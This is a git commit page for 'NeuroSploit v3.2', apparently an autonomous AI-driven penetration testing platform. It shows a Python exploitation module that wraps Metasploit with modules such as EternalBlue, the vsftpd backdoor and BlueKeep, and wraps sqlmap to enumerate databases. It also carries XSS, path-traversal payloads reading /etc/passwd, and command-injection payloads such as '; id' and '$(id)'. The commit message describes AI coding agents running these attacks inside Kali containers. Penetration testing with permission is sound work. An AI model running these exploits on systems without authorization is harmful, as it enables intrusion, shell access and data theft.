CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-03-20 01:03:49 +00:00
Code Issues Packages Projects Releases Wiki Activity

NeuroSploit v3.2 - Autonomous AI Penetration Testing Platform

Browse Source 
116 modules | 100 vuln types | 18 API routes | 18 frontend pages

Major features:
- VulnEngine: 100 vuln types, 526+ payloads, 12 testers, anti-hallucination prompts
- Autonomous Agent: 3-stream auto pentest, multi-session (5 concurrent), pause/resume/stop
- CLI Agent: Claude Code / Gemini CLI / Codex CLI inside Kali containers
- Validation Pipeline: negative controls, proof of execution, confidence scoring, judge
- AI Reasoning: ReACT engine, token budget, endpoint classifier, CVE hunter, deep recon
- Multi-Agent: 5 specialists + orchestrator + researcher AI + vuln type agents
- RAG System: BM25/TF-IDF/ChromaDB vectorstore, few-shot, reasoning templates
- Smart Router: 20 providers (8 CLI OAuth + 12 API), tier failover, token refresh
- Kali Sandbox: container-per-scan, 56 tools, VPN support, on-demand install
- Full IA Testing: methodology-driven comprehensive pentest sessions
- Notifications: Discord, Telegram, WhatsApp/Twilio multi-channel alerts
- Frontend: React/TypeScript with 18 pages, real-time WebSocket updates
This commit is contained in:
CyberSecurityUP
2026-02-22 17:58:12 -03:00
commit e0935793c5
271 changed files with 132462 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
tools/exploitation/__init__.py Executable file
View File

@@ -0,0 +1,8 @@
from .exploitation_tools import (
ExploitDatabase,
MetasploitWrapper,
WebExploiter,
SQLInjector,
RCEExploiter,
BufferOverflowExploiter
)

363
tools/exploitation/exploitation_tools.py Executable file
View File

@@ -0,0 +1,363 @@
#!/usr/bin/env python3
"""
Exploitation Tools - Exploit database, Metasploit wrapper, specialized exploiters
"""
import subprocess
import json
import requests
from typing import Dict, List
import logging
import time
logger = logging.getLogger(__name__)
class ExploitDatabase:
"""Exploit database search and management"""
def __init__(self, config: Dict):
self.config = config
self.db_path = "/usr/share/exploitdb"
def search(self, service: str, version: str = None) -> List[Dict]:
"""Search for exploits"""
logger.info(f"Searching exploits for: {service} {version or ''}")
exploits = []
try:
cmd = ['searchsploit', service]
if version:
cmd.append(version)
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=30
)
# Parse searchsploit output
for line in result.stdout.split('\n'):
if '|' in line and not line.startswith('-'):
parts = line.split('|')
if len(parts) >= 2:
exploits.append({
"title": parts[0].strip(),
"path": parts[1].strip(),
"module": self._path_to_module(parts[1].strip())
})
except Exception as e:
logger.error(f"Exploit search error: {e}")
return exploits
def _path_to_module(self, path: str) -> str:
"""Convert exploit path to module name"""
return path.replace('/', '.').replace('.rb', '').replace('.py', '')
class MetasploitWrapper:
"""Metasploit Framework wrapper"""
def __init__(self, config: Dict):
self.config = config
self.msf_path = config.get('tools', {}).get('metasploit', '/usr/bin/msfconsole')
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Execute Metasploit exploit"""
logger.info(f"Attempting Metasploit exploit on {target}")
service = vulnerability.get('service', '').lower()
port = vulnerability.get('port', 0)
# Map service to exploit module
module = self._select_module(service, vulnerability)
if module:
return self.run_exploit(module, target, port)
return {"success": False, "message": "No suitable module found"}
def _select_module(self, service: str, vulnerability: Dict) -> str:
"""Select appropriate Metasploit module"""
modules = {
'smb': 'exploit/windows/smb/ms17_010_eternalblue',
'ssh': 'auxiliary/scanner/ssh/ssh_login',
'ftp': 'exploit/unix/ftp/vsftpd_234_backdoor',
'http': 'auxiliary/scanner/http/dir_scanner',
'mysql': 'auxiliary/scanner/mysql/mysql_login',
'postgres': 'auxiliary/scanner/postgres/postgres_login',
'rdp': 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
}
return modules.get(service)
def run_exploit(self, module: str, target: str, port: int = None) -> Dict:
"""Run specific Metasploit module"""
logger.info(f"Running module: {module}")
result = {
"success": False,
"module": module,
"target": target,
"output": "",
"shell_access": False
}
try:
# Build MSF resource script
resource_script = self._build_resource_script(module, target, port)
# Execute via msfconsole
cmd = [self.msf_path, '-q', '-r', resource_script]
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=300
)
result["output"] = proc.stdout
# Check for successful exploitation
if 'session opened' in proc.stdout.lower():
result["success"] = True
result["shell_access"] = True
result["shell_info"] = self._extract_shell_info(proc.stdout)
except Exception as e:
logger.error(f"Metasploit execution error: {e}")
result["error"] = str(e)
return result
def _build_resource_script(self, module: str, target: str, port: int = None) -> str:
"""Build MSF resource script"""
script_path = f"/tmp/msf_resource_{int(time.time())}.rc"
script_content = f"""use {module}
set RHOST {target}
"""
if port:
script_content += f"set RPORT {port}\n"
script_content += """set ExitOnSession false
exploit -z
exit
"""
with open(script_path, 'w') as f:
f.write(script_content)
return script_path
def _extract_shell_info(self, output: str) -> Dict:
"""Extract shell session information"""
return {
"type": "meterpreter",
"established": True
}
class WebExploiter:
"""Web application exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit web vulnerabilities"""
vuln_type = vulnerability.get('type')
if vuln_type == 'xss':
return self._exploit_xss(target, vulnerability)
elif vuln_type == 'csrf':
return self._exploit_csrf(target, vulnerability)
elif vuln_type == 'lfi':
return self._exploit_lfi(target, vulnerability)
elif vuln_type == 'rfi':
return self._exploit_rfi(target, vulnerability)
return {"success": False, "message": "Unknown vulnerability type"}
def _exploit_xss(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit XSS vulnerability"""
payloads = [
'<script>alert(1)</script>',
'<img src=x onerror=alert(1)>',
'<svg onload=alert(1)>'
]
for payload in payloads:
try:
response = requests.get(
f"{target}?{vulnerability.get('parameter')}={payload}",
timeout=10
)
if payload in response.text:
return {
"success": True,
"vulnerability": "XSS",
"payload": payload
}
except:
continue
return {"success": False}
def _exploit_csrf(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit CSRF vulnerability"""
return {"success": False, "message": "CSRF exploitation placeholder"}
def _exploit_lfi(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit Local File Inclusion"""
payloads = [
'../../../etc/passwd',
'....//....//....//etc/passwd',
'/etc/passwd'
]
for payload in payloads:
try:
response = requests.get(
f"{target}?file={payload}",
timeout=10
)
if 'root:' in response.text:
return {
"success": True,
"vulnerability": "LFI",
"payload": payload,
"data": response.text[:500]
}
except:
continue
return {"success": False}
def _exploit_rfi(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit Remote File Inclusion"""
return {"success": False, "message": "RFI exploitation placeholder"}
class SQLInjector:
"""SQL Injection exploitation"""
def __init__(self, config: Dict):
self.config = config
self.sqlmap_path = config.get('tools', {}).get('sqlmap', '/usr/bin/sqlmap')
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit SQL injection"""
logger.info(f"Attempting SQL injection on {target}")
result = {
"success": False,
"vulnerability": "SQL Injection",
"databases": [],
"tables": [],
"dumped_data": []
}
try:
# Basic SQLMap scan
cmd = [
self.sqlmap_path,
'-u', target,
'--batch',
'--random-agent',
'--dbs'
]
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=300
)
if 'available databases' in proc.stdout.lower():
result["success"] = True
result["databases"] = self._extract_databases(proc.stdout)
except Exception as e:
logger.error(f"SQL injection error: {e}")
result["error"] = str(e)
return result
def _extract_databases(self, output: str) -> List[str]:
"""Extract database names from SQLMap output"""
databases = []
for line in output.split('\n'):
if '[*]' in line and len(line.strip()) > 4:
db_name = line.split('[*]')[1].strip()
if db_name and not db_name.startswith('available'):
databases.append(db_name)
return databases
class RCEExploiter:
"""Remote Code Execution exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit RCE vulnerability"""
logger.info(f"Attempting RCE on {target}")
# Test various RCE payloads
payloads = [
'; id',
'| id',
'`id`',
'$(id)',
'; whoami',
'| whoami'
]
for payload in payloads:
try:
response = requests.get(
f"{target}?cmd={payload}",
timeout=10
)
# Check for command execution indicators
if any(x in response.text.lower() for x in ['uid=', 'gid=', 'root', 'www-data']):
return {
"success": True,
"vulnerability": "RCE",
"payload": payload,
"output": response.text[:500]
}
except:
continue
return {"success": False}
class BufferOverflowExploiter:
"""Buffer overflow exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit buffer overflow"""
logger.info(f"Attempting buffer overflow on {target}")
# This is a complex topic - placeholder for demonstration
return {
"success": False,
"message": "Buffer overflow exploitation requires specific target analysis"
}